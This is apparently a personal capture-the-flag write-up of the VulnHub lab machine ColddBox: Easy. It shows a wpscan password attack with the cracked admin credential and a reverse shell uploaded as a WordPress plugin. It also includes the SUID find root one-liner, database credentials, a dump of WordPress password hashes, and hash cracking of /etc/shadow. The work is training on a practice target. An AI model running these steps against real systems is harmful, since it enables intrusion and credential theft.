Welcome to ColddBox Easy, it is a Wordpress machine with an easy level of difficulty, highly recommended for beginners in the field, good luck! Please share your feedback: “”

This is ColddBox: Easy from vulnhub. Last one before bedtime - this will be brief.


This box just has HTTP on port 80 and SSH on a non-standard port: 4512. We won’t be needing it anyway.


The website is running Wordpress, and wpscan finds several users. I run a password attack:

root@kali:/opt/vulnhub/coldbox# wpscan --url -U 'hugo,c0ldd,philip' -P /usr/share/seclists/Passwords/probable-v2-top12000.txt

And find the password for c0ldd

[!] Valid Combinations Found:
| Username: c0ldd, Password: 9876543210

I stop the scan at this point and login. c0ldd is the admin and we have an older version of Wordpress, so I upload a reverse shell as a plugin and get on the box.


We’ve got find with the SUID bit set, so that’s our path to root.

GTFOBins says:

./find . -exec /bin/sh -p \; -quit

www-data@ColddBox-Easy:/var/www/html$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls 
# cat root.txt
cat root.txt

That was that.

Other stuff

I also found the database creds:

/var/www/html/wp-config.php:define(‘DB_PASSWORD’, ‘cybersecurity’);
/var/www/html/wp-config.php:define(‘DB_USER’, ‘c0ldd’);

So I logged in and grabbed the hashes:

www-data@ColddBox-Easy:/var/www/html$ mysql --host=localhost -u c0ldd -p
mysql --host=localhost -u c0ldd -p
Enter password: cybersecurity

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 13593
Server version: 10.0.38-MariaDB-0ubuntu0.16.04.1 Ubuntu 16.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
| Database           |
| colddbox           |
| information_schema |
2 rows in set (0.00 sec)

MariaDB [(none)]> use colddbox;
use colddbox;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [colddbox]> select * from wp_users;
select * from wp_users;
| ID | user_login | user_pass                          | user_nicename | user_email           | user_url | user_registered     | user_activation_key | user_status | display_name       |
|  1 | c0ldd      | $P$BJs9aAEh2WaBXC2zFhhoBrDUmN1g0i1 | c0ldd         |  |          | 2020-09-24 15:06:57 |                     |           0 | the cold in person |
|  2 | hugo       | $P$B2512D1ABvEkkcFZ5lLilbqYFT1plC/ | hugo          |   |          | 2020-09-24 15:48:13 |                     |           0 | hugo               |
|  4 | philip     | $P$BXZ9bXCbA1JQuaCqOuuIiY4vyzjK/Y. | philip        | |          | 2020-10-19 17:38:25 |                     |           0 | philip             |
3 rows in set (0.00 sec)

The hash for Hugo cracked easily but he’s not a system user so I logged into Wordpress, but there was nothing interesting there. The other one didn’t want to crack, so that was a dead end anyway.

c0ldd didn’t reuse his Wordpress password for his Linux account, so I couldn’t su to him. I grabbed his hash from /etc/shadow and it’s running in Hashcat but hasn’t broken yet … I’m off to bed :)